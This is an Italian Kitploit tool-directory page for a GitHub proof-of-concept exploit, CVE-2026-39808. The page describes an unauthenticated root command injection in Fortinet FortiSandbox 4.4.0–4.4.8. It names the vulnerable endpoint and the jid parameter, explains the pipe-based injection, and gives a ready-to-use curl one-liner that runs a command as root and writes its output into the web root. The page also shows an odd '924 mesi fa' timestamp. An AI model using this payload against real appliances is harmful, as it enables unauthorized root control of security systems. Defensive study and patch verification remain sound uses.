Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39808 — PoC per RCE non autenticata in FortiSandbox tramite CVE-2026-39808 | Kitploit
Strumenti/GitHubGitHub/samu-delucas/cve-2026-39808
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubsamu-delucas/cve-2026-39808

CVE-2026-39808

PoC per RCE non autenticata in FortiSandbox tramite CVE-2026-39808

Vedi Repository
924 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-39808

A novembre 2025, è stata scoperta una vulnerabilità critica in FortiSandbox di Fortinet che consentiva a un attaccante non autenticato di eseguire comandi nel sistema operativo sottostante come root. La vulnerabilità è stata corretta e infine resa pubblica ad aprile 2026.

Questa vulnerabilità interessa le versioni di FortiSandbox dalla 4.4.0 alla 4.4.8.

Leggi l'advisory completo qui.

La vulnerabilità

La vulnerabilità interessa l'endpoint /fortisandbox/job-detail/tracer-behavior. I comandi del sistema operativo possono essere iniettati usando il simbolo pipe (|) nel parametro GET jid.

image008

Nell'esempio precedente, l'output è stato reindirizzato a un file nella root web, così da poter essere recuperato successivamente.

image

PoC

Un semplice comando curl è sufficiente per ottenere RCE come root senza alcuna autenticazione precedente:

root@kitploit:~
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"
Scarica lo strumento